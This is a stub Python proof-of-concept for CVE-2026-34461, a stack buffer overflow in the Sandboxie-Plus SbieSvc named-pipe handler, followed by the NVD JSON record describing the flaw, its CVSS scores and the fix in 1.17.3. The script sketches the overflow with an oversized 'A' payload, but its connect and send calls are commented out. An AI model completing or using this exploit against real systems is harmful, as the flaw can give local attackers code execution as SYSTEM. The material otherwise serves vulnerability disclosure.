CVE-2026-34461

import ctypes import struct # PoC for CVE-2026-34461: Sandboxie-Plus Stack Buffer Overflow # This script demonstrates the concept of overflowing the stack buffer # in the SbieIniServer RunSbieCtrl handler. # Constants based on vulnerability description PIPE_NAME = r"\\.\pipe\SandboxieControlPort" # Actual pipe name may vary, needs reverse engineering BUFFER_SIZE = 128 # Size of the target WCHAR buffer OVERFLOW_SIZE = 500 # Size of payload to trigger overflow def trigger_overflow(): print("[*] Attempting to connect to Sandboxie service pipe...") # In a real scenario, we would use CreateFile to connect to the named pipe. # handle = ctypes.windll.kernel32.CreateFileW(PIPE_NAME, 0x40000000, 0, None, 3, 0, None) # Construct the malicious payload # The handler expects a specific message structure, usually a header followed by data. # We send a large amount of 'A's to overflow the 128 WCHAR buffer. payload = b"A" * OVERFLOW_SIZE # The MSGID_SBIE_INI_RUN_SBIE_CTRL message handler logic # copies payload directly into a fixed stack buffer. print(f"[*] Sending payload of size {len(payload)} bytes...") print("[*] If successful, the SbieSvc service should crash or execute code.") # WriteFile(handle, payload, ...) if __name__ == "__main__": trigger_overflow()

{"cve": {"id": "CVE-2026-34461", "sourceIdentifier": "[email protected]", "published": "2026-05-05T20:16:37.460", "lastModified": "2026-05-07T19:47:45.650", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Sandboxie-Plus is an open source sandbox-based isolation software for Windows. In versions 1.17.2 and earlier, the SbieIniServer RunSbieCtrl handler contains a stack buffer overflow. The MSGID_SBIE_INI_RUN_SBIE_CTRL message is handled before normal sandbox and impersonation checks, and for non-sandboxed callers, the handler copies the trailing message payload into a fixed-size WCHAR ctrlCmd[128] stack buffer using memcpy without verifying the length fits within the buffer. The service pipe is created with a NULL DACL, allowing any local interactive process to connect and send an oversized payload to overflow the stack. This can lead to a crash of the SbieSvc service or potential code execution as SYSTEM. This issue has been fixed in version 1.17.3."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:L/AC:H/AT:P/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 7.3, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "HIGH", "attackRequirements": "PRESENT", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-121"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:sandboxie-plus:sandboxie:*:*:*:*:plus:*:*:*", "versionEndExcluding": "1.17.3", "matchCriteriaId": "69CB00B4-502D-4839-B404-93FA214C6978"}]}]}], "references": [{"url": "https://github.com/sandboxie-plus/Sandboxie/security/advisories/GHSA-wpjw-jh2p-gwx7", "source": "[email protected]", "tags": ["Exploit", "Mitigation", "Vendor Advisory"]}]}}